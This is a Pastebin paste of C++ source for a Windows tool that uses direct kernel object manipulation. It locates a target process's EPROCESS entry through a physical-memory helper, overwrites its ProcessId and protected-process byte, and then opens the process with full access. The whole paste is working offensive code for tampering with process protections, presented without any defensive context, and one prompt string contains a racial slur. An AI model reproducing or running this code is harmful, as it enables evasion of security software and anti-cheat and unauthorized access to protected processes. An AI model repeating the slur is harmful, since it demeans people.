Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include <Windows.h>
- #include <Winternl.h>
- #include <TlHelp32.h>
- #include <PSAPI.h>
- #include <SHLWAPI.h>
- #include <thread>
- #include <string>
- #include <vector>
- #include <codecvt>
- #include <algorithm>
- #include <iostream>
- #include <unordered_map>
- #include "PMemHelper.h"
- using namespace std;
- #define A(s) Util::ToA(s)
- #define W(s) Util::ToW(s)
- #define LC(s) Util::ToLower(s)
- class Util
- {
- public:
- static wstring ToW(string str)
- {
- wstring_convert<codecvt_utf8_utf16<wchar_t>> converter;
- return converter.from_bytes(str);
- }
- static string ToA(wstring wstr)
- {
- wstring_convert<codecvt_utf8_utf16<wchar_t>> converter;
- return converter.to_bytes(wstr);
- }
- static string ToLower(string str)
- {
- transform(str.begin(), str.end(), str.begin(), tolower);
- return str;
- }
- static wstring ToLower(wstring str)
- {
- transform(str.begin(), str.end(), str.begin(), tolower);
- return str;
- }
- static DWORD GetProcessIdByName(string name)
- {
- DWORD pid = false;
- HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
- PROCESSENTRY32 entry;
- entry.dwSize = sizeof(entry);
- if (!Process32First(snap, &entry)) return false;
- do
- {
- if (LC(entry.szExeFile) == LC(W(name)))
- {
- pid = entry.th32ProcessID;
- }
- } while (Process32Next(snap, &entry));
- CloseHandle(snap);
- return pid;
- }
- };
- void main()
- {
- PMemHelper* mem = new PMemHelper();
- start:
- printf("\n\n");
- string tgt;
- printf("Enter target process name nigger\n");
- getline(cin, tgt);
- auto targetPid = Util::GetProcessIdByName(tgt);
- if (!targetPid)
- {
- printf("process doesn't exist, try again pls\n");
- goto start;
- }
- printf("got target process Id: %d\n", targetPid);
- auto targetDirbase = mem->GetDirBase(targetPid);
- auto targetBase = mem->GetProcessBase(targetPid);
- auto kernelDirbase = mem->GetKernelDirBase();
- auto ntoskrnlBase = SFGetModuleBase("ntoskrnl.exe");
- printf("target dirbase: 0x%X, target proc base: 0x%X\nkernel dirbase: 0x%X, kernel base:0x%X\n", targetDirbase, targetBase, kernelDirbase, ntoskrnlBase);
- // memory read test
- char buff[255];
- auto res = mem->ReadVirtual(targetDirbase, targetBase, (uint8_t*)(buff), 255);
- buff[2] = '\0';
- if (!res || buff != "MZ"s)
- {
- printf("memory read test failed\n");
- return;
- }
- printf("memory read test success, buff: %s\n", buff);
- auto pTargetProcessEntry = mem->GetEProcess(targetPid);// SFGetEProcess(targetPid);
- if (!pTargetProcessEntry)
- {
- printf("can't get EPROCESS address for given PID\n");
- goto start;
- }
- printf("got target EPROCESS address: 0x%X\n", pTargetProcessEntry);
- printf("press enter to do DKOM magic lol\n");
- string s;
- getline(cin, s);
- if (s != "")
- {
- printf("aborting...\n");
- goto start;
- }
- askagain:
- printf("enter new ProcessId for %s:\n", tgt.c_str());
- uintptr_t newPid;
- cin >> newPid;
- printf("Setting new ProcessId...\n");
- res = mem->WriteVirtual(kernelDirbase, pTargetProcessEntry + mem->EPPidOffset, (uint8_t*)&newPid, 8);
- uint8_t oldProtek;
- mem->ReadVirtual(kernelDirbase, pTargetProcessEntry + 0x6CA, &oldProtek, 1);
- printf("Old protection: %d\n", oldProtek);
- printf("Lol enter new protection lol:\n");
- uint8_t newProtection = 0;
- cin >> newProtection;
- printf("Setting protection...\n");
- auto res1 = mem->WriteVirtual(kernelDirbase, pTargetProcessEntry + 0x6CA, &newProtection, 1);
- if (!res || !res1)
- {
- printf("magic failed\n");
- goto start;
- }
- printf("magic suceeded.\n");
- printf("Trying to open the process..\n");
- auto htarget = OpenProcess(PROCESS_ALL_ACCESS, 0, newPid);
- printf("hTarget: 0x%X\n", htarget);
- getchar();
- goto start;
- getchar();
- return;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement